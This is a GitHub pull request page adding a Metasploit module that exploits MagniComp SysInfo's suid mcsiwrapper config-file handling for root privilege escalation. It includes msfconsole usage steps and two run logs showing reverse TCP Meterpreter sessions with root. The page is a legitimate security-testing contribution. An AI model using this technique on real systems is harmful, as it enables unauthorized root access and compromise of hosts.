Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit #9504

Merged
merged 3 commits into from Feb 20, 2018

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Feb 5, 2018

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit.

        This module attempts to gain root privileges on systems running
        MagniComp SysInfo versions prior to 10-H64.

        The .mcsiwrapper suid executable allows loading a config file using the
        '--configfile' argument. The 'ExecPath' config directive is used to set
        the executable load path. This module abuses this functionality to set
        the load path resulting in execution of arbitrary code as root.

        This module has been tested successfully with SysInfo version
        10-H63 on Fedora 20 x86_64 and 10-GA on Solaris 10u11 x86.

Verification

  • Start msfconsole
  • Get a session
  • use use multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
session => 1
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Using target: Linux
[*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
[*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
[+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
[+] Deleted /tmp/.0rk4PC/eoGVzYwGa
[+] Deleted /tmp/.0rk4PC

meterpreter > getuid
Server username: uid=0, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

@Chiggins
Copy link
Contributor

@Chiggins Chiggins commented Feb 7, 2018

If anyone doesn't mind, I'm going to self assign for my first PR as a committer. 💯

@Chiggins Chiggins self-assigned this Feb 7, 2018
@busterb
Copy link
Contributor

@busterb busterb commented Feb 7, 2018

Go for it!

@Chiggins
Copy link
Contributor

@Chiggins Chiggins commented Feb 7, 2018

Tested against Fedora 27 and it worked like a charm!

msf5 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.252:4445 
[*] Using target: Linux
[*] Writing '/tmp/.Duxko1/9M2WGR' (21 bytes) ...
[*] Writing '/tmp/.Duxko1/zuc5EBYz' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 192.168.1.162

meterpreter > sysinfo 
Computer     : fedora27.chigs.local
OS           : Fedora 27 (Linux 4.13.9-300.fc27.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid 
Server username: uid=0, gid=1000, euid=0, egid=1000

@Chiggins Chiggins merged commit 1177efe into rapid7:master Feb 20, 2018
1 check passed
@bcoles bcoles deleted the magnicomp_sysinfo_mcsiwrapper_priv_esc branch Feb 20, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants